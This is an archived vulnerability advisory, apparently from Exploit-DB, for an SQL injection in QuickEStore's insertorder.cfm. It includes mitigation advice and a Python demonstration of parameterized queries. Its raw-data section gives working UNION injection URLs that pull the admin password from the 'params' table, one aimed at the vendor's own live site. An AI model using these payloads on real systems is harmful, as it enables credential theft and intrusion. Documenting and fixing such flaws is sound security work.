Vendor: QuickEStore
By: meoconx[at]vnbrain.net
CVSS: 7.5 (HIGH)
Vulnerability: SQL Injection
CWE: 89
Product Name: QuickEStore
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

SQL Injection in QuickEStore

The vulnerability allows an attacker to execute arbitrary SQL queries in the 'insertorder.cfm' page. By manipulating the 'CFID' and 'CFTOKEN' parameters, an attacker can retrieve sensitive information such as the admin password.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented in the application code. Additionally, access controls should be enforced to limit the privileges of database users.
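
The mitigation above, as an added example that is not QuickEStore's code or part of the original advisory: the same lookup written with string concatenation and then with validation plus bound parameters. Python with sqlite3 stands in for the ColdFusion page and its database (in CFML the binding step is done with `cfqueryparam`); the `orders` table, its columns, the function names, the sample values and the assumption that CFID and CFTOKEN are decimal integers are all hypothetical, and only the `params` table and `password` column come from the advisory.

```python
import re
import sqlite3

# Constructed input, modelled on the advisory's CFTOKEN value but sized to
# the three columns of the hypothetical orders query below.
SAMPLE_CFTOKEN = "1 UNION SELECT 1,2,password FROM params"

def make_db():
    """Build a constructed in-memory database for the demonstration."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE orders (cfid INTEGER, cftoken INTEGER, item TEXT);
        CREATE TABLE params (password TEXT);
        INSERT INTO orders VALUES (123, 1, 'widget');
        INSERT INTO params VALUES ('constructed-admin-secret');
    """)
    return db

def lookup_concatenated(db, cfid, cftoken):
    """'Before' form: request values become part of the SQL text."""
    sql = ("SELECT cfid, cftoken, item FROM orders "
           f"WHERE cfid = {cfid} AND cftoken = {cftoken}")
    return db.execute(sql).fetchall()

# Assumption: both identifiers are plain decimal integers.
DECIMAL = re.compile(r"[0-9]{1,10}")

def lookup_parameterized(db, cfid, cftoken, validate=True):
    """Hardened form: validate the identifiers, then bind them as data."""
    if validate:
        for name, value in (("CFID", cfid), ("CFTOKEN", cftoken)):
            if not DECIMAL.fullmatch(value):
                raise ValueError(f"{name} must be a decimal integer")
    # Placeholders keep the statement text fixed; values never reach the parser.
    sql = "SELECT cfid, cftoken, item FROM orders WHERE cfid = ? AND cftoken = ?"
    return db.execute(sql, (cfid, cftoken)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", lookup_concatenated(db, "123", SAMPLE_CFTOKEN))
    print("bound only   :", lookup_parameterized(db, "123", SAMPLE_CFTOKEN, validate=False))
    try:
        lookup_parameterized(db, "123", SAMPLE_CFTOKEN)
    except ValueError as exc:
        print("validated    :", exc)
```

Binding alone already stops the value from changing the statement; the validation step additionally rejects the request early, which gives a clean point to log malformed CFID/CFTOKEN values.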

Exploit-DB raw data:

author:meoconx[at]vnbrain.net
web application:QuickEStore
Main Page:www.quickestore.com
bug:

sql injection at insertorder.cfm?CFID=123&CFTOKEN=1'

exploit:

http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1[sql query]

get admin password:
http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1

link admin:http://www.xxx.com/admin/

demo(main site :D :D):
http://www.quickestore.com/ppec/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20params%22having%201=1

# milw0rm.com [2007-07-18]